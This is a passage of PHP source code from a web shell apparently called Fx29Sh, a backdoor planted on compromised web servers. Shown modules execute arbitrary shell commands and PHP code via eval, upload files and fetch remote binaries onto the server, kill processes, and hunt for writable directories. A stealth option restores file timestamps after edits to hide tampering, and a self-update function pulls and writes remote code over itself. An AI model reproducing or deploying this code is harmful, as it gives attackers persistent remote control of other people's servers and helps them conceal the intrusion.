\n"; } } } ##[ UPLOAD ]## if ($act == "upload") { $uploadmess = ""; $uploadpath = (isset($uploadpath)) ? str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath) : $d; if (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) { $uploadpath .= DIRECTORY_SEPARATOR; } if (!empty($submit)) { $uploadfile = $_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) { $destin = $uploadfile["name"]; } else { $destin = $userfilename; } if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) { $uploadmess .= "
Error uploading file ".$uploadfile["name"]." (Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
"; } else { $uploadmess .= "File uploaded successfully!
".$uploadpath.$destin; } } else { $uploadmess .= "
No file to upload!
"; } } echo $uploadmess; $act = "ls"; } ##{ DELETE }## if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."
"; } } if (!empty($delerr)) { disp_error("Error deleting:
$delerr"); } $act = "ls"; } ##[ COPY ]## if ($act == "copy") { $err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); fx29_sess_put($sess_data); $act = "ls"; } ##[ CUT ]## elseif ($act == "cut") { $sess_data["cut"] = array_merge($sess_data["cut"],$actbox); fx29_sess_put($sess_data); $act = "ls"; } ##[ UNSELECT ]## elseif ($act == "unselect") { foreach ($sess_data["copy"] as $k=>$v) { if (in_array($v,$actbox)) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k=>$v) { if (in_array($v,$actbox)) { unset($sess_data["cut"][$k]); } } fx29_sess_put($sess_data); $act = "ls"; } ##[ EMPTY BUFFER ]## if (@$actemptybuff) { $sess_data["copy"] = $sess_data["cut"] = array(); fx29_sess_put($sess_data); } ##[ PASTE BUFFER ]## elseif (@$actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$to)) { $psterr .= "Can't copy ".$v." to ".$to."!
"; } if ($copy_unset) { unset($sess_data["copy"][$k]); } } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) { $psterr .= "Can't move ".$v." to ".$to."!
"; } unset($sess_data["cut"][$k]); } fx29_sess_put($sess_data); if (!empty($psterr)) { disp_error("Pasting with errors:
$psterr"); } $act = "ls"; } ##[ ARCHIVE BUFFER ]## elseif (@$actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") { $ext = ".tar.gz"; } else { $ext = ".tar.gz"; } if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; } $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) { $v = basename($v); } if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = fx29exec($cmdline); chdir($tmp); if (empty($ret)) { $arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
"; } $ret = str_replace("\r\n","\n",$ret); $ret = explode("\n",$ret); if ($copy_unset) { foreach($sess_data["copy"] as $k=>$v) { unset($sess_data["copy"][$k]); } } foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) { fs_rmobj($v); } unset($sess_data["cut"][$k]); } fx29_sess_put($sess_data); if (!empty($arcerr)) { disp_error("Archivation errors:
$arcerr"); } $act = "ls"; } ##[ CMD ]## if ($act == "cmd") { @chdir($chdir); if (!empty($submit)) { echo "
.: Command Output :.
\n"; $olddir = realpath("."); @chdir($d); $ret = fx29exec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode("\n",$ret))+1; if ($rows < 10) { $rows = 10; } else { $rows = 30; } $cols = 125; echo "\n"; } else { echo $ret."
"; } @chdir($olddir); } } ##[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]## if ($act == "phpfsys") { echo "
"; $fsfunc = $phpfsysfunc; if ($fsfunc=="copy") { if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";} else { echo "Success! $arg1 copied to $arg2\n"; } } elseif ($fsfunc=="rename") { if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";} else { echo "Success! $arg1 renamed/moved to $arg2\n"; } } elseif ($fsfunc=="chmod") { if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";} else { echo "Perm for $arg1 changed to $arg2!\n"; } } elseif ($fsfunc=="read") { $darg = $d.$arg1; if ($hasil = @file_get_contents($darg)) { echo "Filename: ".$darg."
"; echo "
\n"; } else { disp_error("Couldn't open $darg"); } } elseif ($fsfunc=="write") { $darg = $d.$arg1; if(@file_put_contents($darg,$arg2)) { echo "Saved! ".$darg; } else { disp_error("Can't write to $darg!"); } } elseif ($fsfunc=="downloadbin") { $handle = fopen($arg1, "rb"); $contents = ''; while (!feof($handle)) { $contents .= fread($handle, 8192); } $r = @fopen($d.$arg2,'w'); if (fwrite($r,$contents)) { echo "Success! $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } else { disp_error("Can't write to ".$d.$arg2."!"); } fclose($r); fclose($handle); } elseif ($fsfunc=="download") { $text = implode('', file($arg1)); if ($text) { $r = @fopen($d.$arg2,'w'); if (fwrite($r,$text)) { echo "Success! $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } else { disp_error("Can't write to ".$d.$arg2."!"); } fclose($r); } else { disp_error("Can't download from $arg1!");} } elseif ($fsfunc=='mkdir') { $thedir = $d.$arg1; if ($thedir != $d) { if (file_exists($thedir)) { echo "Already exists: ".htmlspecialchars($thedir); } elseif (!mkdir($thedir)) { echo "Access denied: ".htmlspecialchars($thedir); } else { echo "Dir created: ".htmlspecialchars($thedir);} } else { echo "Can't create current dir: $thedir"; } } elseif ($fsfunc=='fwritabledir') { function recurse_dir($dir,$max_dir) { global $dir_count; $dir_count++; if( $cdir = dir($dir) ) { while( $entry = $cdir-> read() ) { if( $entry != '.' && $entry != '..' ) { if(is_dir($dir.$entry) && is_writable($dir.$entry) ) { if ($dir_count > $max_dir) { return; } echo "[".$dir_count."] ".$dir.$entry."\n"; recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir); } } } $cdir->close(); } } if (!$arg1) { $arg1 = $d; } if (!$arg2) { $arg2 = 10; } if (is_dir($arg1)) { echo "Writable directories (Max: $arg2) in: $arg1
"; echo "


        echo "
"; $total = $dir_count - 1; echo "
Founds: ".$total." of Max $arg2"; } else { disp_error("Directory is not exists or permission denied!"); } } else { if (!$arg1) { disp_error("No operation! Please fill 1st parameter!"); } else { if ($hasil = $fsfunc($arg1)) { echo "Result of $fsfunc $arg1:
"; if (!is_array($hasil)) { echo "$hasil\n"; } else { echo "

            foreach ($hasil as $v) { echo $v."\n"; }

            echo "
"; } } else { disp_error("$fsfunc $arg1 failed!"); } } } echo "
\n"; } ##[ DIRECTORY LIST ]## if ($act == "ls") { if (count($ls_arr) > 0) { $list = $ls_arr; } else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) { $list[] = $d.$o; } closedir($h); } } if (count($list) == 0) { disp_error("No such directory or access denied!
".htmlspecialchars($d)); } else { $objects = array(); $vd = "f"; #Viewing mode if ($vd == "f") { $objects["head"] = array(); $objects["folders"] = array(); $objects["links"] = array(); $objects["files"] = array(); foreach ($list as $v) { $o = basename($v); $row = array(); if ($o == ".") { $row[] = $d.$o; $row[] = "CURDIR"; } elseif ($o == "..") { $row[] = $d.$o; $row[] = "DIR"; } elseif (is_dir($v)) { if (is_link($v)) { $type = "LINK"; } else { $type = "DIR"; } $row[] = $v; $row[] = $type; } elseif(is_file($v)) { $row[] = $v; $row[] = filesize($v); } $row[] = filemtime($v); if (!is_windows()) { $ow = posix_getpwuid(fileowner($v)); $gr = posix_getgrgid(filegroup($v)); $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); } $row[] = fileperms($v); if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} elseif (is_link($v)) { $objects["links"][] = $row; } elseif (is_dir($v)) { $objects["folders"][] = $row; } elseif (is_file($v)) { $objects["files"][] = $row; } $i++; } $row = array(); $row[] = "Name"; $row[] = "Size"; $row[] = "Date Modified"; if (!is_windows()) {$row[] = "Owner/Group";} $row[] = "Perms"; $row[] = "Action"; $parsesort = parsesort($sort); $sort = $parsesort[0].$parsesort[1]; $k = $parsesort[0]; if ($parsesort[1] != "a") {$parsesort[1] = "d";} $y = " "; $y .= "\"".($parsesort[1]"; $row[$k] .= $y; for($i=0;$i".$row[$i]."";} } $v = $parsesort[0]; usort($objects["folders"], "tabsort"); usort($objects["links"], "tabsort"); usort($objects["files"], "tabsort"); if ($parsesort[1] == "d") { $objects["folders"] = array_reverse($objects["folders"]); $objects["files"] = array_reverse($objects["files"]); } $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); $tab = array(); $tab["cols"] = array($row); $tab["head"] = array(); $tab["folders"] = array(); $tab["links"] = array(); $tab["files"] = array(); $i = 0; foreach ($objects as $a) { $v = $a[0]; $o = basename($v); $dir = dirname($v); if ($disp_fullpath) { $disppath = $v; } else { $disppath = $o; } $disppath = str2mini($disppath,60); if (in_array($v,$sess_data["cut"])) { $disppath = "".$disppath.""; } elseif (in_array($v,$sess_data["copy"])) { $disppath = "".$disppath.""; } foreach ($regxp_highlight as $r) { if ( ereg($r[0],strtolower($o)) ) { if ((!is_numeric($r[1])) or ($r[1] > 3)) { $r[1] = 0; @ob_clean(); disp_error("Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."); fx29shexit(); } else { $r[1] = round($r[1]); $isdir = is_dir($v); if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { if (empty($r[2])) {$r[2] = ""; $r[3] = "";} $disppath = $r[2].$disppath.$r[3]; if (isset($r[4])) { break; } } } } } $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = "\"\" ".$o.""; $row[] = "CURDIR"; } elseif ($o == "..") { $row[] = "\"\" ".$o.""; $row[] = "UPDIR"; } elseif (is_dir($v)) { if (is_link($v)) { $disppath .= " => ".readlink($v); $type = "LNK"; $row[] = "\"\" [".$disppath."]"; } else { $type = "DIR"; $row[] = "\"\" [".$disppath."]"; } $row[] = $type; } elseif(is_file($v)) { $ext = explode(".",$o); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $row[] = "\"\" ".$disppath.""; $row[] = view_size($a[1]); } $row[] = @date("d.m.Y H:i:s",$a[2]); if (!is_windows()) { $row[] = $a[3]; } $row[] = "".view_perms_color($v).""; if ($o == ".") { $checkbox = ""; $i--; } else { $checkbox = ""; } if (is_dir($v)) { $row[] = "$checkbox \"Info\" "; } else { $row[] = "$checkbox ". "\"Info\" ". "\"Edit\" ". "\"Download\""; } if (($o == ".") or ($o == "..")) { $tab["head"][] = $row; } elseif (is_link($v)) { $tab["links"][] = $row; } elseif (is_dir($v)) { $tab["folders"][] = $row; } elseif (is_file($v)) { $tab["files"][] = $row; } $i++; } } #Listing Files & Folders echo "
.: "; if (!empty($fx_infohead)) { echo $fx_infohead; } else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; } echo " :.
\n\n"; echo "
\n". "\n". "\n"; ?> "; foreach($row as $v) { echo ""; } echo "\n"; } ?>
0) { echo "\t". "\t\n". "\t\n". "\t"; } echo "\n\t". "
"; if (!isset($ft)) { $ft = ""; } if (!isset($newwin)) { $newwin = ""; } if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) { disp_error("Access denied!
".htmlspecialchars($d.$f)); } else { disp_error("File doesn't exists: ".htmlspecialchars($d.$f)."
\n". "Create"); } } else { $r = @file_get_contents($d.$f); $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach ($ftypes as $k => $v) { if (in_array($ext,$v)) { $rft = $k; break; } } if (eregi("sess_(.*)",$f)) { $rft = "phpsess"; } if (empty($ft)) { $ft = $rft; } $arr = array( array("\"Info\"","info"), array("\"html\"","html"), array("\"txt\"","txt"), array("\"ini\"","ini"), array("Code","code"), array("Session","phpsess"), array("SDB","sdb"), array("\"exe\"","exe"), array("\"img\"","img"), array("\"Notepad\"","notepad"), array("\"Edit\"","edit"), array("\"Download\"","download") ); echo "
.: File Viewer [".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f).") :.\n"; echo "
\n"; foreach($arr as $t) { if ($t[1] == $rft) { echo "".$t[0].""; } elseif ($t[1] == $ft) { echo "".$t[0].""; } else { echo "".$t[0].""; } echo " (+) "; } echo "
\n"; if ($ft == "info") { echo "
\n". "\n". "\n". "\n". "\n"; if (!is_windows()) { echo "\n". "\n". "\n". "\n"; echo "\n". "\n". "
Owner/Group"; $ow = posix_getpwuid(fileowner($d.$f)); $gr = posix_getgrgid(filegroup($d.$f)); echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); } echo "
Create time".date("d/m/Y H:i:s",filectime($d.$f))."
Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
Modify time ".date("d/m/Y H:i:s",filemtime($d.$f))."
HexDump\n". "[ Full ] ". "[ Preview ]
\n". "
Base64\n". "[ Encode ] ". "[ +chunk ] ". "[ +chunk+quotes ] ". "[ Decode ] ". "

\n"; $fi = fopen($d.$f,"rb"); if ($fi) { echo "
"; if (@$fullhexdump) { echo "Full HexDump"; $str = fread($fi,filesize($d.$f)); } else { echo "HexDump Preview"; $str = fread($fi,$hexdump_lines*$hexdump_rows); } $n = 0; $a0 = "00000000
"; $a1 = ""; $a2 = ""; for ($i=0; $i";} $a1 .= "
"; $a2 .= "
"; } } echo "
\n"; echo "

\n"; } $henc = ""; $encoded = ""; if (!isset($base64)) { $base64 = ""; } if ($base64 == 1) { $henc = "Base64 Encode"; $encoded = base64_encode(file_get_contents($d.$f)); } elseif($base64 == 2) { $henc = "Base64 Encode + Chunk"; $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); } elseif($base64 == 3) { $henc = "Base64 Encode + Chunk + Quotes"; $encoded = base64_encode(file_get_contents($d.$f)); $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); } elseif($base64 == 4) { $text = file_get_contents($d.$f); $encoded = base64_decode($text); $henc = "Base64 Decode"; if (base64_encode($encoded) != $text) { $henc .= " (Failed!)"; } } if (!empty($encoded)) { echo "
\n"; echo ""; echo "
\n"; } } elseif ($ft == "html") { if ($newwin) { @ob_clean(); echo $r; fx29shexit(); } else { echo $r; } } elseif ($ft == "txt") { echo "
"; } elseif ($ft == "ini") { echo "
"; var_dump(parse_ini_file($d.$f,TRUE)); echo "
"; } elseif ($ft == "phpsess") { echo "

        $v = explode("|",$r);

        echo $v[0]."
"; var_dump(unserialize($v[1])); echo "
"; } elseif ($ft == "exe") { $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach ($exeftypes as $k => $v) { if (in_array($ext,$v)) { $rft = $k; break; } } $cmd = str_replace("%f%",$f,$rft); echo "Execute file:\n". "
\n". "\n". "
\n". " \n". " - Display in text-area\n". "
\n"; } elseif ($ft == "sdb") { echo "
"; var_dump(unserialize(base64_decode($r))); echo "
\n"; } elseif ($ft == "code") { echo "
\n"; if (@$newwin) { @ob_clean(); highlight_file($d.$f); fx29shexit(); } else { highlight_file($d.$f); } echo "\n
\n"; } elseif ($ft == "notepad") { @ob_clean(); header("Content-type: text/plain"); header("Content-disposition: attachment; filename=\"".$f.".txt\";"); echo($r); exit; } elseif ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".filesize($d.$f)); header("Content-disposition: attachment; filename=\"".$f."\";"); echo $r; exit; } elseif ($ft == "img") { $inf = getimagesize($d.$f); if (!$newwin) { if (empty($imgsize)) {$imgsize = 20;} $width = $inf[0]/100*$imgsize; $height = $inf[1]/100*$imgsize; echo "
Size: "; $sizes = array("100","50","20"); foreach ($sizes as $v) { echo ""; if ($imgsize != $v ) {echo $v;} else {echo "".$v."";} echo "   "; } echo "

"; } else { @ob_clean(); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; header("Content-type: ".$inf["mime"]); readfile($d.$f); exit; } } elseif ($ft == "edit") { if (!empty($submit)) { if ($filestealth) {$stat = stat($d.$f);} $fp = fopen($d.$f,"w"); if (!$fp) {echo "Can't write to file!";} else { echo "Saved!"; fwrite($fp,$edit_text); fclose($fp); if ($filestealth) { touch($d.$f,$stat[9],$stat[8]); } $r = $edit_text; } } $rows = count(explode("\r\n",$r)); if ($rows < 10) { $rows = 10; } elseif ($rows > 30) { $rows = 30; } echo "
\n". " ". " ". "
". "\n". "
\n"; } elseif (!empty($ft)) { echo "
Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
"; } else { echo "
Unknown file type (".$ext."), please select type manually.
"; } } echo "
\n"; } ##[ DIRECTORY ]## if ($act == "d") { if (!is_dir($d)) { echo "
$d is a not a Directory!
"; } else { echo "Directory information:\n"; echo "\n"; if (!is_windows()) { echo "
Owner/Group "; $ow = posix_getpwuid(fileowner($d)); $gr = posix_getgrgid(filegroup($d)); $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); } echo "
Create time ".date("d/m/Y H:i:s",filectime($d))."
Access time ".date("d/m/Y H:i:s",fileatime($d))."
MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."
"; } } ##[ PROCESSES ]## if ($act == "processes") { ?>
.: Processes :.
\"Desc\""; } else { $y = " \"Asc\""; } $ret = htmlspecialchars($ret); if (!is_windows()) { if ($pid) { if (is_null($sig)) { $sig = 9; } echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) { echo "OK!"; } else { echo "ERROR!"; } } while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); } $stack = explode("\n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); for($i=0;$i".$head[$i].""; } } $head[$i] = ""; $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { $line = explode(" ",$line); $line[10] = join(" ",array_slice($line,10)); $line = array_slice($line,0,11); if ($line[0] == get_current_user()) { $line[0] = ''.$line[0].""; } $line[] = "KILL"; $prcs[] = $line; } } } #For Windows - Fixed By FaTaLisTiCz_Fx else { if (@$pid) { echo "Killing PID ".$pid."... "; echo fx29exec("taskkill /PID $pid /F"); } while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); } while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); } $ret = convert_cyr_string($ret,"d","w"); $stack = explode("\n",$ret); unset($stack[0],$stack[2]); $stack = array_values($stack); $stack[0] = str_replace("Image Name","Image-Name",$stack[0]); $stack[0] = str_replace("Session Name","Session-Name",$stack[0]); $stack[0] = str_replace("Mem Usage","Memory-Usage",$stack[0]); $stack[0] .= " KILL"; $head = explode(" ",$stack[0]); $stack = array_slice($stack,1); $head = array_values($head); if ($parsesort[1] != "a") { $y = " \"Desc\""; } else { $y = " \"Asc\""; } if ($k > count($head)) {$k = count($head)-1;} for($i=0;$i".trim($head[$i]).""; } } $prcs = array(); unset($stack[0]); foreach ($stack as $line) { if (!empty($line)) { $line = explode(" ",$line); $line[4] = str_replace(".","",$line[4]); $line[4] = intval($line[4]) * 1024; unset($line[5]); $line[] = "KILL"; $prcs[] = $line; } } } $head[$k] = "".$head[$k]."".$y; $v = $processes_sort[0]; usort($prcs,"tabsort"); if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); } $tab = array(); $tab[] = $head; $tab = array_merge($tab,$prcs); echo "\n"; foreach($tab as $i=>$k) { echo "\t"; foreach($k as $j=>$v) { if (is_windows() and $i > 0 and $j == 4) { $v = view_size($v); } echo ""; } echo "\n"; } echo "
\n"; } } ##[ EVAL ]## if ($act == "eval") { if (!empty($eval)) { echo "
Result of execution this PHP-code:
\n"; $tmp = @ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { @ob_clean(); eval($eval); $ret = @ob_get_contents(); $ret = convert_cyr_string($ret,"d","w"); @ob_clean(); echo $tmp; if (@$eval_txt) { $rows = count(explode("\r\n",$ret))+1; if ($rows < 10) {$rows = 10;} echo "
"; } else {echo $ret."
";} } else { if ($eval_txt) { echo "
"; } else {echo $ret;} } @chdir($olddir); } else { echo "
.: PHP-code Execution :.
\n\n"; if (empty($eval_txt)) { $eval_txt = TRUE; } } ?>

Display in text-area >
"; if (stristr($ret,"new version")) { echo "

"; } } if ($act == "phpinfo") { @ob_clean(); phpinfo(); fx29shexit(); } if ($act == "tools") { fx29sh_tools(); } if ($act == "about") { fx29sh_about(); } } ##[ END OF ACTIONS ]## ###################### ##[ COMMANDS PANEL ]## ###################### ?>
Quick Commands:
PHP Filesystem:
$o) { echo "\t\n"; } ?>
Filesystem Search:
&1', 'r'); if ( is_resource($h) ) { while ( !feof($h) ) { $output .= fread($h, 2096); } pclose($h); } } elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); } elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); } elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); } return $output; } ##[ FX29EXEC W/O STDERR ]## function fx29exec2($cmd) { $output = ""; if ( enabled("shell_exec") ) { $output = shell_exec($cmd); } elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); } elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } #Dipindahkan kesini karena menimbulkan masalah pada output control elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); } elseif ( enabled("popen") ) { $h = popen($cmd.' 2>&1', 'r'); if ( is_resource($h) ) { while ( !feof($h) ) { $output .= fread($h, 2096); } pclose($h); } } return $output; } function is_windows() { return strtolower(substr(PHP_OS,0,3)) == "win"; } function which($pr) { $path = fx29exec("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } } function get_status() { $arrfunc = array( array("MySQL","mysql_connect"), array("MSSQL","mssql_connect"), array("Oracle","ocilogon"), array("PostgreSQL","pg_connect"), array("Curl","curl_version"), ); $arrcmd = array( array("Fetch","fetch --help"), array("Wget","wget --help"), array("Perl","perl -v"), ); $statinfo = array(); function showstat($sup,$stat) { if ($stat == "on") { return "$sup: ON"; } else { return "$sup: OFF"; } } foreach ($arrfunc as $func) { if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); } else { $statinfo[] = showstat($func[0],"off"); } } $statinfo[] = (@extension_loaded('sockets')) ? showstat("Sockets","on") : showstat("Sockets","off"); foreach ($arrcmd as $cmd) { if (fx29exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); } else { $statinfo[] = showstat($cmd[0],"off"); } } return implode(" ",$statinfo); } function showdisfunc() { $disfunc = getdisfunc(); if ($disfunc = @ini_get("disable_functions")) { return ''.$disfunc.''; } else { return 'NONE'; } } function disp_drives($curdir,$surl) { $letters = ""; $v = explode("\\",$curdir); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = $isdiskette = $letter == "A"; if (!$bool) { $bool = is_dir($letter.":\\"); } if ($bool) { $letters .= " "; if ($letter.":" != $v) { $letters .= $letter; } else { $letters .= "".$letter.""; } $letters .= " "; } } if (!empty($letters)) { Return $letters; } else { Return "None"; } } function view_size($size) { if (!is_numeric($size)) { return FALSE; } else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; } } function disp_freespace($curdrv) { $free = @disk_free_space($curdrv); $total = @disk_total_space($curdrv); if ($free === FALSE) { $free = 0; } if ($total === FALSE) { $total = 0; } if ($free < 0) { $free = 0; } if ($total < 0) { $total = 0; } $used = $total-$free; $free_percent = round(100/($total/$free),2)."%"; $free = view_size($free); $total = view_size($total); return "$free of $total ($free_percent)"; } ##[ Fx29Sh UPDATE FUNCTIONS ]## function fx29sh_getupdate($update = FALSE) { global $fx29sh_updateurl; $url = $fx29sh_updateurl."?version=".urlencode(base64_encode(sh_ver)); $data = @file_get_contents($url); if (!$data) { return "
Can't connect to update-server! ($fx29sh_updateurl)
"; } else { $data = ltrim($data); if ($data{0} == "\x99" and $data{1} == "\x01") { return "You already using latest version!"; } if ($data{0} == "\x99" and $data{1} == "\x02") { $string = substr($data,3,ord($data{2})); $string = explode("|",$string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = @file_get_contents($sourceurl); if (!$source) { return "Can't fetch update!"; } else { $fp = @fopen(__FILE__,"w"); if (!$fp) { return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually here."; } else { fwrite($fp,$source); fclose($fp); return "Update completed!"; } } } else { return "New version is available: ".$string[1]; } } elseif ($data{0} == "\x99" and $data{1} == "\x03") { eval($string); return TRUE; } else { return "
Error in protocol: segmentation failed! (".$data.")
"; } } } ##[ END Fx29Sh UPDATE FUNCTIONS ]## function fx29_buff_prepare() { global $sess_data, $act; foreach ($sess_data["copy"] as $k=>$v) { $sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v)); } foreach ($sess_data["cut"] as $k=>$v) { $sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v)); } $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") { foreach ($sess_data["cut"] as $k=>$v) { if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); } } } else { foreach ($sess_data["copy"] as $k=>$v) { if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); } } } } function fx29_sess_put($data) { global $sess_cookie; global $sess_data; fx29_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } ##[ FILESYSTEM FUNCTIONS ]## function fs_copy_dir($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } function fs_copy_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) { return copy($d,$t); } else { return FALSE; } } function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { $ret = TRUE; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } function fs_move_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return FALSE;} } else {return FALSE;} } function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } function fs_rmobj($o) { $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return FALSE;} } ##[ END FILESYSTEM FUNCTIONS ]## ##[ FX29SH EXIT 